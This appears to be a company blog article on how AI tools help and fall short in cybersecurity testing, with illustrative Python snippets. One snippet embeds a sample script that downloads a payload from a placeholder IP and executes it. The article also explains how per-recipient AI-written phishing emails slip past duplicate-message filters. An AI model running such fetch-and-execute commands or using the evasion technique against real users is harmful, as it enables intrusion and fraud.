Excited about the potential of artificial intelligence (AI)? You’re not alone.
The last several months have seen the mass-market introduction of AI tools such as ChatGPT, Bard by Google, Bing AI and others. Many of these tools are large language models (LLMs) that can answer in-depth questions and generate articles, computer programs and other work.
As AI technology develops and improves, the hope is that cybersecurity teams could use it to test systems and identify flaws faster than current penetration tests can.
While there are some use cases that make sense right now, most cybersecurity work still requires human expertise and oversight.
“Large language models are not a substitute for skill or experience,” said Victor Teissler, Director of Offensive Security at Digital Silence, a boutique cybersecurity agency.
“It’s a tool. And you still have to have a skilled and experienced person to vet or review the output to make sure that it’s valid.”
Why Companies Should Be Cautious About AI and Cybersecurity
There are a few reasons why AI tools aren’t perfect solutions for cybersecurity testing today.
Sometimes AI simply makes up information. As more people started using ChatGPT this year, they noticed something: When answering a question, the tool would sometimes return false answers and even generate fake evidence to support them.
You might have heard what happened to the two attorneys who submitted a ChatGPT-generated motion in federal court. The document was filled with fabricated opinions and citations that ChatGPT had produced and neither attorney had vetted.
This type of error is called a hallucination, and it’s something that can happen with large language models. The tool will generate answers that sound reasonable.
“But if you start pulling on the threads,” Teissler said, “then you’ll realize that some of the documents that it’s citing or some of the things that it’s alleging to be true are factually baseless.”
AI may generate too many false positives. For example, an AI-powered monitoring tool might flag a user who is generating a large number of LDAP queries. The user could have a legitimate reason for running those queries, but the AI doesn't account for that context.
If the AI keeps flagging innocent activity, the organization may start to ignore those warnings and take security reviews less seriously, which could give actual threat actors the opening they need to create real havoc.
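To see how easily that can happen, here is a minimal sketch of a threshold-based detector. The log format, account names and alerting threshold are all made up for illustration; the point is that a service account running a scheduled directory audit trips the same rule a compromised account would.

```python
from collections import Counter

# Hypothetical LDAP query log for one monitoring window: (account, query) pairs.
ldap_log = [
    ("jdoe", "(sAMAccountName=jdoe)"),
    ("svc_audit", "(objectClass=user)"),    # scheduled directory audit job
    ("svc_audit", "(objectClass=group)"),
] + [("svc_audit", f"(memberOf=CN=group{i})") for i in range(500)]

QUERY_THRESHOLD = 100  # assumed alerting threshold

def flag_noisy_accounts(log, threshold=QUERY_THRESHOLD):
    """Flag any account whose LDAP query count exceeds the threshold."""
    counts = Counter(account for account, _ in log)
    return [account for account, n in counts.items() if n > threshold]

# The audit service account gets flagged even though its activity is legitimate.
print(flag_noisy_accounts(ldap_log))  # ['svc_audit']
```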
It’s possible to trick AI. An AI-powered image classifier can distinguish a photo of a dog from a photo of a cat, Teissler said. But researchers have found that changing a few pixels, in ways practically invisible to the human eye, can trick the program into calling a cat a dog.
What if a similar technique were applied to traffic on a computer system?
“We could see a similar type of attack where just by changing a few bits, something that was considered malicious is now being seen as not malicious,” Teissler said.
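The underlying idea can be shown with a toy example. The sketch below uses a hand-rolled linear classifier rather than a real image model, so the "pixels", weights and labels are purely illustrative, but the mechanics are the same: a tiny, carefully chosen nudge to every input value flips the prediction.

```python
import numpy as np

rng = np.random.default_rng(0)

# Toy setup: a 28x28 "image" and a hand-rolled linear classifier.
# (Weights and data are illustrative, not from any real model.)
x = rng.uniform(0.0, 1.0, size=784)   # pixel intensities in [0, 1]
w = rng.normal(0.0, 1.0, size=784)    # classifier weights

def predict(image):
    return "dog" if image @ w > 0 else "cat"

original = predict(x)

# Adversarial-style perturbation: nudge every pixel a tiny amount in the
# direction that pushes the score toward the opposite class.
score = x @ w
epsilon = abs(score) / np.sum(np.abs(w)) * 1.01   # just enough to cross zero
x_adv = x - np.sign(score) * epsilon * np.sign(w)

print(original, "->", predict(x_adv))        # the label flips
print("largest per-pixel change:", epsilon)  # a tiny fraction of the 0-1 range
```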
How Cybersecurity Experts Use AI Today
While AI isn’t a perfect tool for cybersecurity, there are some use cases where it does make sense right now.
Creating better phishing emails at scale. As part of a cybersecurity review, testers will often send phishing emails that attempt to trick users into clicking a “malicious” link.
Digital Silence has used ChatGPT to create unique, customized emails for a large group of recipients. The writing looks authentic, and the messages are harder for security programs to flag.
Those programs often use a filter that looks for identical messages being sent to multiple recipients at the same company. Because ChatGPT makes each email different, the messages are more likely to pass through the filter, Teissler said.
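A rough sketch of that kind of filter (the hashing approach and the threshold are assumptions, not any particular product's logic) shows why identical templated messages get caught while individually generated ones slip through:

```python
import hashlib
from collections import Counter

def body_fingerprint(body: str) -> str:
    """Hash the normalized message body so identical copies collide."""
    normalized = " ".join(body.lower().split())
    return hashlib.sha256(normalized.encode()).hexdigest()

def flag_bulk_duplicates(messages, threshold=5):
    """Flag fingerprints that arrive for many recipients at once."""
    counts = Counter(body_fingerprint(body) for _, body in messages)
    return {fp for fp, n in counts.items() if n >= threshold}

# A templated campaign sends the same body to every recipient and gets caught;
# per-recipient wording produces distinct fingerprints and does not.
templated = [(f"user{i}@example.com", "Please review the attached invoice today.")
             for i in range(20)]
unique = [(f"user{i}@example.com", f"Hi, quick question about the Q{i % 4 + 1} numbers when you get a chance.")
          for i in range(20)]

print(len(flag_bulk_duplicates(templated)))  # 1 duplicate cluster flagged
print(len(flag_bulk_duplicates(unique)))     # 0 clusters flagged
```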
Analyzing malware. Some cybersecurity experts will ask their AI tool to project how a piece of malware would behave if it were run.
It’s a great way to see what could happen without actually executing the malware and putting your systems at risk.
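One way to set that up, sketched below with the OpenAI Python client, is to paste the code into a prompt and ask the model to walk through what it would do if executed. The model name, the prompt wording and the deliberately simple stand-in "sample" are all assumptions here, not Digital Silence's actual workflow.

```python
from openai import OpenAI

client = OpenAI()  # reads OPENAI_API_KEY from the environment

# Harmless stand-in for a suspicious script; a real analysis would use the
# sample under investigation. The IP below is a documentation-only address.
suspicious_script = r"""
import os, urllib.request
urllib.request.urlretrieve("http://203.0.113.9/payload.bin", "/tmp/p.bin")
os.system("chmod +x /tmp/p.bin && /tmp/p.bin")
"""

response = client.chat.completions.create(
    model="gpt-4o",  # assumed model name; use whatever your account offers
    messages=[
        {"role": "system", "content": "You are assisting an authorized malware analyst."},
        {"role": "user", "content": "Without running it, describe step by step what this "
                                    "script would do if executed and what artifacts it "
                                    "would leave behind:\n" + suspicious_script},
    ],
)

print(response.choices[0].message.content)
```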
Generating prototype code quickly. Digital Silence has used ChatGPT to create basic programs as part of its security testing — for example, a Python program that can interact with an API.
“Something that would have taken a couple of hours instead took something on the order of minutes,” Teissler said.
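The kind of prototype he's describing might look something like the following. The endpoint, fields and authentication scheme are hypothetical; the point is that this is routine boilerplate an LLM can draft in seconds and a tester can then review and adapt.

```python
import requests

BASE_URL = "https://api.example.com/v1"   # hypothetical API under test
API_KEY = "REPLACE_ME"

def list_items(session: requests.Session):
    """Fetch a page of items and return the parsed JSON."""
    resp = session.get(f"{BASE_URL}/items", params={"limit": 25}, timeout=10)
    resp.raise_for_status()
    return resp.json()

def create_item(session: requests.Session, name: str):
    """Create an item and return the server's response."""
    resp = session.post(f"{BASE_URL}/items", json={"name": name}, timeout=10)
    resp.raise_for_status()
    return resp.json()

if __name__ == "__main__":
    with requests.Session() as s:
        s.headers.update({"Authorization": f"Bearer {API_KEY}"})
        print(list_items(s))
        print(create_item(s, "test-item"))
```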
In each of these cases, the AI can still make errors. A human being needs to edit and approve the work. But even when you add in that additional review time, the gains in efficiency are often significant.
AI Can — and Probably Will — Improve
Even if AI isn’t a perfect solution right now, several companies are working to build new AI-powered cybersecurity tools.
For example, Sugar Security and other red-team tech vendors are starting to leverage AI for offensive security, said Logan Evans, a Senior Tester at Digital Silence.
Some blue-team vendors say they’re using AI now, but it’s not clear how (or how much) AI is being employed.
“I think we’re going to see some interesting AI usage in offensive security as well as defensive security very soon,” Teissler said. “I feel like it’s imminent.”
Teissler would be more likely to trust AI tools if the models assigned a confidence score to each piece of information in their output. That is, how confident is the model that its work is accurate? That would give users more insight into exactly where they need to review or revise the AI’s work.
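No mainstream model reports that directly today, but a sketch of what such output could look like is straightforward. The findings, the schema and the 0-to-1 scale below are invented for illustration.

```python
from dataclasses import dataclass

@dataclass
class Finding:
    """One claim from an AI-assisted report, tagged with the model's own confidence."""
    claim: str
    confidence: float  # 0.0 (guess) to 1.0 (near certain); hypothetical scale

report = [
    Finding("The /admin endpoint accepts unauthenticated POST requests.", 0.92),
    Finding("The session cookie is missing the Secure flag.", 0.85),
    Finding("The deployed web server version has known vulnerabilities.", 0.40),
]

# Low-confidence claims are the ones a human reviewer should verify first.
for finding in sorted(report, key=lambda f: f.confidence):
    print(f"[{finding.confidence:.2f}] {finding.claim}")
```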
Until that happens, companies should continue running tests with AI, but verify any output before relying on it.
“Use it,” Teissler said, “but don’t trust it blindly.”